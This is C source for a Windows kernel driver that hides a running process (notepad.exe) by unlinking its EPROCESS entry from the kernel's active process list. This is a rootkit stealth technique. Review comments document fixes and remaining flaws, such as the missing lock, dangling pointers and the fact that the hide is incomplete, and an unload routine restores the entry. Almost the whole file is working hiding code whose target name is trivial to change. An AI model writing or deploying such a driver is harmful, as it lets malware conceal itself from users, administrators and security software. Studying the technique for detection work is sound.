#include <ntddk.h>
/*
 * Hard-coded byte offsets into the undocumented nt!_EPROCESS structure.
 * Every pointer arithmetic below depends on these being exactly right for
 * the kernel build the driver is loaded on; a mismatch turns the list walk
 * into a wild kernel read/write (bugcheck or silent corruption).
 * NOTE(review): the name says XP, but nothing here checks the running
 * build — verify with `dt nt!_EPROCESS` on the target before loading on
 * anything other than the 32-bit build these were taken from.
 */
enum XP_SYSTEM
{
g_uNextProcess = 0x88,   /* _EPROCESS.ActiveProcessLinks.Flink (LIST_ENTRY start) */
g_uPrevProcess = 0x8c,   /* _EPROCESS.ActiveProcessLinks.Blink */
g_uImageFileName = 0x174 /* _EPROCESS.ImageFileName (short, fixed-size char array) */
};
/* ActiveProcessLinks entry of the process that was unlinked, or NULL if none
 * was found; MyDriverUnload re-links it. Points into the EPROCESS itself,
 * so it dangles if that process exits while hidden — nothing here tracks that. */
PLIST_ENTRY g_pListEntryTemp = NULL;
/* ActiveProcessLinks entry of the process DriverEntry ran in; used as the
 * insertion point when the hidden entry is restored on unload. */
PLIST_ENTRY g_pHeadEntry = NULL;
/*
 * Driver unload callback: puts the previously unlinked ActiveProcessLinks
 * entry back into the kernel's process list so the process becomes
 * enumerable again.
 *
 * Parameters:
 *   pDriverObject - driver object passed by the I/O manager (unused).
 *
 * NOTE(review): both g_pHeadEntry and g_pListEntryTemp are raw pointers into
 * EPROCESS objects captured earlier. If the hidden process has exited in the
 * meantime, InsertHeadList writes into freed pool; nothing in this file
 * detects that case (a process-exit notify routine would be the usual fix).
 * The kernel's own lock around this list is not taken here either.
 */
VOID MyDriverUnload(PDRIVER_OBJECT pDriverObject)
{
    PLIST_ENTRY pHiddenEntry = g_pListEntryTemp;

    UNREFERENCED_PARAMETER(pDriverObject);

    /* Nothing was unlinked (no match, or HideProcessor never ran). */
    if (pHiddenEntry == NULL)
    {
        return;
    }

    InsertHeadList(g_pHeadEntry, pHiddenEntry);
}
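/*
 * Walk the kernel's circular ActiveProcessLinks list (using the XP_SYSTEM
 * offsets), unlink the first EPROCESS whose ImageFileName is "notepad.exe",
 * and remember the unlinked entry in g_pListEntryTemp so MyDriverUnload can
 * restore it.
 *
 * Changes vs. the earlier version of this routine:
 *   - The walk started at the current process and stopped when it reached
 *     the process *before* it, so that last process was never compared.
 *     The loop now visits every node exactly once and returns to its start.
 *   - The name match was a case-sensitive strcmp against "NOTEPAD.EXE";
 *     ImageFileName carries whatever case the image was launched with, so
 *     the compare is now case-insensitive and bounded to the 16-byte field.
 *   - After RemoveEntryList the orphaned entry still pointed at its old
 *     neighbours; if one of them exited later, the kernel's own unlink at
 *     the hidden process's exit would write through a stale pointer. The
 *     entry is now pointed at itself so that unlink becomes a no-op.
 *
 * NOTE(review): this manipulates a kernel list without the lock the kernel
 * uses for it, and only hides the process from list walkers — other
 * bookkeeping (handle/PID tables) is untouched, so this is neither safe
 * under concurrent process creation/exit nor a complete hide.
 */
VOID HideProcessor()
{
    PEPROCESS pStartProcess = PsGetCurrentProcess();
    PLIST_ENTRY pStartEntry = (PLIST_ENTRY)((ULONG_PTR)pStartProcess + g_uNextProcess);
    PLIST_ENTRY pEntry = pStartEntry;

    /* Circular list: follow Flink until we are back at the entry we began on,
     * so the start process and every other process are each inspected once. */
    do
    {
        PEPROCESS pProcess = (PEPROCESS)((ULONG_PTR)pEntry - g_uNextProcess);
        PCHAR pImageName = (PCHAR)((ULONG_PTR)pProcess + g_uImageFileName);

        /* 16 = size of the ImageFileName array; bounds the read even if the
         * field is not NUL-terminated on this build. */
        if (_strnicmp(pImageName, "notepad.exe", 16) == 0)
        {
            KdPrint(("..."));
            RemoveEntryList(pEntry);

            /* Self-link the orphaned entry: a later RemoveEntryList on it
             * (e.g. at process exit) then rewrites only its own fields. */
            pEntry->Flink = pEntry;
            pEntry->Blink = pEntry;

            g_pListEntryTemp = pEntry;
            break;
        }

        KdPrint(("---"));
        pEntry = pEntry->Flink;
    } while (pEntry != pStartEntry);
}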
/*
 * Driver entry point: records the ActiveProcessLinks entry of the process
 * this code runs in (used later as the re-insertion point), installs the
 * unload routine, then attempts to unlink the target process.
 *
 * Parameters:
 *   pDriverObject - driver object supplied by the I/O manager.
 *   pStrRegPath   - registry service path (unused).
 *
 * Returns STATUS_SUCCESS unconditionally, even if HideProcessor found nothing
 * or raised an exception.
 *
 * NOTE(review): the __try/__except wrapper gives less protection than it
 * looks — a dereference of an invalid kernel-mode address inside
 * HideProcessor generally bugchecks rather than raising a catchable
 * exception. Confirm on the target build before relying on it.
 */
NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pStrRegPath)
{
    PEPROCESS pLoaderProcess = PsGetCurrentProcess();

    UNREFERENCED_PARAMETER(pStrRegPath);

    /* Install the unload routine first so the restore path exists before
     * anything is unlinked. */
    pDriverObject->DriverUnload = MyDriverUnload;

    /* Assumes the loading process outlives the driver; the unload routine
     * inserts back next to this entry. */
    g_pHeadEntry = (PLIST_ENTRY)((ULONG_PTR)pLoaderProcess + g_uNextProcess);

    __try
    {
        HideProcessor();
    }
    __except (EXCEPTION_EXECUTE_HANDLER)
    {
        KdPrint(("异常..."));
    }

    return STATUS_SUCCESS;
}